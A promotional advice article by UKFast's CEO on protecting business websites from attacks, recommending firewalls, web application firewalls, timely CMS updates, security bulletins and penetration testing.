Top tips from Lawrence Jones, founder and CEO of UKFast, on how to keep your website safe from malicious threats this Christmas.
Data loss and downtime are arguably the two scariest terms for businesses operating on the internet these days. The reputational damage and heavy fines that can come from being hacked and leaking information are enough to bring a company to its knees.You can trust me when it comes to this; during UKFast’s fifteen years, I’ve seen grown men and women in tears thinking that everything they’d worked so hard for was falling apart. Fortunately, when most of these people came to us asking for help, we’ve been able to provide it, but there are preventative and proactive ways to protect against online threats and make sure your website is always available for customers.
Getting the basics right
Firewalls and Web Application Firewalls
Whilst most businesses are taking security really seriously, there are still some huge brand names operating online without the basic security guards in place. For example, some are reluctant to spend money on a dedicated firewall; and firewalls, whilst not bulletproof, are still an essential part of protecting your website – and your business – from harm. If you use a shared hosting platform, ask your hosting provider whether all of its users are behind a firewall. In my opinion, they should be. Wherever possible, I would always recommend a dedicated firewall, and I really can’t stress how important this is. Put simply, servers without firewalls in front of them are vulnerable to attack.
For extra protection, a web application firewall can be placed behind your normal firewall, analysing inbound HTTP and HTTPS traffic for suspicious activity. In more targeted attacks, a hacker might try to exploit weaknesses in your application code. These attacks are disguised as genuine requests made to forms on your website. To a traditional firewall they will appear authentic, but a WAF will inspect them for cross-site scripting, SQL injection and other types of attack.
When it comes to websites, one of the main problems is code and the constant task of keeping on top of it. A number of content management systems(CMS) are free, such as WordPress and Drupal, which attracts businesses to the idea of managing their own code. However, the problem with this software arises because a lot of the groundwork has been done for users. Without having built it from the ground up, there are bound to be gaps in understanding. As a business owner, you are then faced with a bit of a dilemma; do you keep updating it and risk coming up against problems you don’t know how to fix?
When it becomes out-of-date, this is where vulnerabilities occur and hackers can get in. In fact, on the day I sat down to write this, a vulnerability was discovered in versions ofDrupal 7, pre 7.31; yet another example of why it’s so important to stay up to date. For business owners who are finding they’re out of their depth with this, I’d advise taking on a server admin or web developer who understand show to use a server, how to update their code and – if there are problems – how to bug fix things.
For a business website to be running smoothly, you have to have what some of our tech team would describe as the “holy trinity”, which comprises a competent hosting provider doing the infrastructure side of things and keeping the network ticking over;a business owner focussing on his or her primary activities, and a web developer maintaining the CMS.
Generally speaking, it’s good practice for everyone to sign up to security bulletins so if flaws are found, you can get the relevant patches applied quickly and efficiently.
Knowing your weaknesses
You’ve probably heard the expression about how the best way to catch a criminal is to think like one. Penetration testing is a process that basically allows you to do this, showing you what your IT infrastructure looks from a hacker’s point of view. This is invaluable, because if you notice any chinks in your armour that they could exploit, you can patch them up before they get the chance.
Pen tests are carried out by cybersecurity experts and they usually start off with a vulnerability scan to check if your network and/or application are reacting to certain inputs as they should be. It basically provides a picture of how a user or attacker could interact with the application. Then, the tester will use that picture to see whether they can break into your system.
Having a real person sitting at a computer, using their brain and their imagination to try and get into your IT infrastructure – just as it would happen in reality – means that your business security really is being tested to breaking point. If your website could be brought down by a hacker, a pen test will flag that up. As the saying goes, knowledge is power. If you know you’re vulnerable, you have the power to fix it.
By Lawrence Jones is the founder and CEO of Manchester-based web hosting firm UKFast